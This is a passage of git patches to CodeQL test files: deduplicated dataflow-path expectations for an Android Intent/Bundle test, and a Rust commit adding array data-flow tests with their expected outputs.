: Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | provenance | MaD:123 | | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | provenance | MaD:123 | | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | Test.java:876:9:876:43 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -858,10 +822,7 @@ edges | Test.java:1042:46:1042:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:1042:46:1042:53 | source(...) : Object | Test.java:1042:25:1042:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:1043:18:1043:19 | in : Bundle [] : String | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:134 | -| Test.java:1043:18:1043:19 | in : Bundle [] : String | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:134 | -| Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | Test.java:1044:9:1044:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:1049:16:1049:56 | (...)... : Bundle [] : String | Test.java:1050:18:1050:19 | in : Bundle [] : String | provenance | | 
@@ -869,10 +830,7 @@ edges | Test.java:1049:48:1049:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:1049:48:1049:55 | source(...) : Object | Test.java:1049:25:1049:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:1050:18:1050:19 | in : Bundle [] : String | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | -| Test.java:1050:18:1050:19 | in : Bundle [] : String | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | -| Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | Test.java:1051:9:1051:43 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -889,15 +847,9 @@ edges | Test.java:1071:48:1071:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:1071:48:1071:55 | source(...) : Object | Test.java:1071:25:1071:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1072:22:1072:23 | in : Bundle [] : String | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | | Test.java:1072:22:1072:23 | in : Bundle [] : String | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | provenance | MaD:138 | -| Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | provenance | MaD:138 | -| Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | provenance | MaD:138 | | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:1073:10:1073:24 | build(...) 
: Notification [extras, ] : String | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | provenance | | | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | provenance | | | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | Test.java:1074:9:1074:38 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -1174,21 +1126,17 @@ nodes | Test.java:79:25:79:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:79:46:79:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:80:18:80:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:81:9:81:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:88:16:88:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:88:25:88:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:88:48:88:55 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:89:18:89:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:90:9:90:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:95:37:95:74 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:95:67:95:74 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1204,15 +1152,11 @@ nodes | Test.java:112:25:112:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:112:48:112:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:113:22:113:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:115:9:115:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | -| Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) 
: Bundle [] : String | | Test.java:120:37:120:74 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:120:67:120:74 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1278,21 +1222,17 @@ nodes | Test.java:206:25:206:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:206:46:206:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:207:18:207:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:208:9:208:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:214:16:214:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:214:25:214:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:214:48:214:55 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:215:18:215:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:216:9:216:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:221:30:221:60 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:221:53:221:60 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1313,15 +1253,11 @@ nodes | Test.java:244:25:244:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:244:48:244:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:245:22:245:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:247:9:247:38 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:247:28:247:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | -| Test.java:247:28:247:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | | Test.java:247:28:247:37 | out.extras : Bundle [] : String | semmle.label | out.extras : Bundle [] : String | | Test.java:252:30:252:60 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:252:53:252:60 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1765,21 +1701,17 @@ nodes | Test.java:851:25:851:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:851:46:851:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:852:18:852:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:853:9:853:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:858:16:858:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:858:25:858:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:858:48:858:55 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:859:18:859:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:860:9:860:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:865:43:865:86 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:865:79:865:86 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1790,15 +1722,11 @@ nodes | Test.java:873:25:873:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:873:48:873:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:874:22:874:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:876:9:876:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | -| Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) 
: Bundle [] : String | | Test.java:881:43:881:86 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:881:79:881:86 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1919,21 +1847,17 @@ nodes | Test.java:1042:25:1042:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:1042:46:1042:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:1043:18:1043:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:1044:9:1044:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:1049:16:1049:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:1049:25:1049:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:1049:48:1049:55 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:1050:18:1050:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:1051:9:1051:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:1056:36:1056:72 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:1056:65:1056:72 | source(...) : Object | semmle.label | source(...) : Object | 
@@ -1949,15 +1873,11 @@ nodes | Test.java:1071:25:1071:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:1071:48:1071:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:1072:22:1072:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:1074:9:1074:38 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | -| Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | semmle.label | out.extras : Bundle [] : String | | Test.java:1079:36:1079:72 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:1079:65:1079:72 | source(...) 
: Object | semmle.label | source(...) : Object | From 3346b64e96b4cfb6657de80e8a6a299f771656e4 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Tue, 3 Dec 2024 13:44:49 +0100 Subject: [PATCH 0777/1267] Rust: Add variables and data flow array tests --- .../dataflow/local/DataFlowStep.expected | 53 ++- .../test/library-tests/dataflow/local/main.rs | 54 +++ .../test/library-tests/variables/Cfg.expected | 356 ++++++++++-------- .../test/library-tests/variables/Ssa.expected | 33 +- .../variables/variables.expected | 48 ++- .../test/library-tests/variables/variables.rs | 9 + 6 files changed, 367 insertions(+), 186 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index bc36656e49d..6828fdf9b7e 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected 
@@ -344,6 +344,57 @@ localStep | main.rs:306:22:306:22 | [SSA] n | main.rs:306:34:306:34 | n | | main.rs:306:22:306:22 | n | main.rs:306:22:306:22 | [SSA] n | | main.rs:306:29:306:35 | sink(...) | main.rs:304:5:307:5 | match s2 { ... } | +| main.rs:314:9:314:12 | [SSA] arr1 | main.rs:315:14:315:17 | arr1 | +| main.rs:314:9:314:12 | arr1 | main.rs:314:9:314:12 | [SSA] arr1 | +| main.rs:314:16:314:33 | [...] | main.rs:314:9:314:12 | arr1 | +| main.rs:315:9:315:10 | [SSA] n1 | main.rs:316:10:316:11 | n1 | +| main.rs:315:9:315:10 | n1 | main.rs:315:9:315:10 | [SSA] n1 | +| main.rs:315:14:315:20 | arr1[2] | main.rs:315:9:315:10 | n1 | +| main.rs:318:9:318:12 | [SSA] arr2 | main.rs:319:14:319:17 | arr2 | +| main.rs:318:9:318:12 | arr2 | main.rs:318:9:318:12 | [SSA] arr2 | +| main.rs:318:16:318:31 | [...] | main.rs:318:9:318:12 | arr2 | +| main.rs:319:9:319:10 | [SSA] n2 | main.rs:320:10:320:11 | n2 | +| main.rs:319:9:319:10 | n2 | main.rs:319:9:319:10 | [SSA] n2 | +| main.rs:319:14:319:20 | arr2[4] | main.rs:319:9:319:10 | n2 | +| main.rs:322:9:322:12 | [SSA] arr3 | main.rs:323:14:323:17 | arr3 | +| main.rs:322:9:322:12 | arr3 | main.rs:322:9:322:12 | [SSA] arr3 | +| main.rs:322:16:322:24 | [...] | main.rs:322:9:322:12 | arr3 | +| main.rs:323:9:323:10 | [SSA] n3 | main.rs:324:10:324:11 | n3 | +| main.rs:323:9:323:10 | n3 | main.rs:323:9:323:10 | [SSA] n3 | +| main.rs:323:14:323:20 | arr3[2] | main.rs:323:9:323:10 | n3 | +| main.rs:328:9:328:12 | [SSA] arr1 | main.rs:329:15:329:18 | arr1 | +| main.rs:328:9:328:12 | arr1 | main.rs:328:9:328:12 | [SSA] arr1 | +| main.rs:328:16:328:33 | [...] | main.rs:328:9:328:12 | arr1 | +| main.rs:329:9:329:10 | [SSA] n1 | main.rs:330:14:330:15 | n1 | +| main.rs:329:9:329:10 | n1 | main.rs:329:9:329:10 | [SSA] n1 | +| main.rs:333:9:333:12 | [SSA] arr2 | main.rs:334:15:334:18 | arr2 | +| main.rs:333:9:333:12 | arr2 | main.rs:333:9:333:12 | [SSA] arr2 | +| main.rs:333:16:333:24 | [...] 
| main.rs:333:9:333:12 | arr2 | +| main.rs:334:5:336:5 | for ... in ... { ... } | main.rs:327:21:337:1 | { ... } | +| main.rs:334:9:334:10 | [SSA] n2 | main.rs:335:14:335:15 | n2 | +| main.rs:334:9:334:10 | n2 | main.rs:334:9:334:10 | [SSA] n2 | +| main.rs:340:9:340:12 | [SSA] arr1 | main.rs:341:11:341:14 | arr1 | +| main.rs:340:9:340:12 | arr1 | main.rs:340:9:340:12 | [SSA] arr1 | +| main.rs:340:16:340:33 | [...] | main.rs:340:9:340:12 | arr1 | +| main.rs:341:5:347:5 | match arr1 { ... } | main.rs:339:26:348:1 | { ... } | +| main.rs:341:11:341:14 | arr1 | main.rs:342:9:342:17 | SlicePat | +| main.rs:342:10:342:10 | [SSA] a | main.rs:343:18:343:18 | a | +| main.rs:342:10:342:10 | a | main.rs:342:10:342:10 | [SSA] a | +| main.rs:342:13:342:13 | [SSA] b | main.rs:344:18:344:18 | b | +| main.rs:342:13:342:13 | b | main.rs:342:13:342:13 | [SSA] b | +| main.rs:342:16:342:16 | [SSA] c | main.rs:345:18:345:18 | c | +| main.rs:342:16:342:16 | c | main.rs:342:16:342:16 | [SSA] c | +| main.rs:342:22:346:9 | { ... } | main.rs:341:5:347:5 | match arr1 { ... } | +| main.rs:351:9:351:19 | [SSA] mut_arr | main.rs:352:10:352:16 | mut_arr | +| main.rs:351:9:351:19 | mut_arr | main.rs:351:9:351:19 | [SSA] mut_arr | +| main.rs:351:23:351:31 | [...] | main.rs:351:9:351:19 | mut_arr | +| main.rs:354:5:354:11 | [SSA] mut_arr | main.rs:355:13:355:19 | mut_arr | +| main.rs:354:5:354:11 | mut_arr | main.rs:354:5:354:11 | [SSA] mut_arr | +| main.rs:354:18:354:27 | source(...) | main.rs:354:5:354:14 | mut_arr[1] | +| main.rs:355:9:355:9 | [SSA] d | main.rs:356:10:356:10 | d | +| main.rs:355:9:355:9 | d | main.rs:355:9:355:9 | [SSA] d | +| main.rs:355:13:355:19 | mut_arr | main.rs:357:10:357:16 | mut_arr | +| main.rs:355:13:355:22 | mut_arr[1] | main.rs:355:9:355:9 | d | storeStep | main.rs:94:14:94:22 | source(...) | tuple.0 | main.rs:94:13:94:26 | TupleExpr | | main.rs:94:25:94:25 | 2 | tuple.1 | main.rs:94:13:94:26 | TupleExpr | 
@@ -385,7 +436,7 @@ storeStep | main.rs:276:41:276:41 | 2 | D | main.rs:276:14:276:43 | ...::D {...} | | main.rs:294:18:294:27 | source(...) | C | main.rs:293:14:295:5 | C {...} | | main.rs:296:27:296:27 | 2 | D | main.rs:296:14:296:29 | D {...} | -| main.rs:314:27:314:27 | 0 | Some | main.rs:314:22:314:28 | Some(...) | +| main.rs:364:27:364:27 | 0 | Some | main.rs:364:22:364:28 | Some(...) | readStep | file://:0:0:0:0 | [summary param] self in lang:core::_::::unwrap | Some | file://:0:0:0:0 | [summary] read: Argument[self].Variant[crate::option::Option::Some(0)] in lang:core::_::::unwrap | | main.rs:33:9:33:15 | TupleStructPat | Some | main.rs:33:14:33:14 | _ |
diff --git a/rust/ql/test/library-tests/dataflow/local/main.rs b/rust/ql/test/library-tests/dataflow/local/main.rs
index 2732e00ecb1..05e0997e6ea 100644
--- a/rust/ql/test/library-tests/dataflow/local/main.rs
+++ b/rust/ql/test/library-tests/dataflow/local/main.rs
@@ -307,6 +307,56 @@ fn custom_record_enum_pattern_match_unqualified() {
 }
 }
 
+// -----------------------------------------------------------------------------
+// Data flow through arrays
+
+fn array_lookup() {
+ let arr1 = [1, 2, source(94)];
+ let n1 = arr1[2];
+ sink(n1); // $ MISSING: hasValueFlow=94
+
+ let arr2 = [source(20); 10];
+ let n2 = arr2[4];
